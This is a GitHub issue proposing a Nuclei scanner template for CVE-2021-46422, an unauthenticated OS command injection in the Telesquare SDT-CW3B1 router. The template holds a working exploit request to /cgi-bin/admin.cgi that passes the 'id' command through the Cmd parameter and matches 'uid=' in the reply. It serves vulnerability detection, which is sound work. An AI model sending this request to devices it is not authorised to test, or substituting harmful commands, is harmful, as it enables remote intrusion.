### ISSUE TITLE
CVE-2021-46422

### ISSUE THREAD

**Issue by badboycxcc** [projectdiscovery/nuclei-templates#4429]
### Template Information:

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

### Nuclei Template:

```yaml
id: CVE-2021-46422

info:
  name: SDT-CW3B1 1.1.0 - OS command injection
  author: remote
  severity: high
  reference: 
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
    - https://www.exploit-db.com/exploits/50936
  tags: cve,cve2021
  classification:
    cve-id: CVE-2021-46422

requests:
  - method: GET
    path:
      - "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}"

    payloads:
      exploit:
        - "id"
    attack: pitchfork
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=.*"
```
